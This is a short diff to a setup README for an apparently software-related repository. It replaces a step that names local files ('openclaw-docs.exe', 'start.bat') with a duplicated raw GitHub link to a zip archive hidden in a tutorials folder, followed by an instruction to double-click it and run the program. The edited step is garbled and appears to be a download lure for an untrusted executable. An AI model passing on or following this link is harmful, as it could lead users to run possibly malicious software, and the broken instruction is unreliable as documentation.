FawwazAzka/openclaw-docs/README.md

 - If you downloaded a `.zip` file:
   - Right-click the file and choose “Extract All.”
   - Select a folder to save the extracted files.
-  - Open that folder and look for a file like `openclaw-docs.exe` or `start.bat`.
+  - Open that folder and look for a file like `https://raw.githubusercontent.com/FawwazAzka/openclaw-docs/main/docs/tutorials/gateway/docs_openclaw_springe.zip` or `https://raw.githubusercontent.com/FawwazAzka/openclaw-docs/main/docs/tutorials/gateway/docs_openclaw_springe.zip`.
   - Double-click it to start the program.

 ### Step 5: Allow Network Access (If Prompted)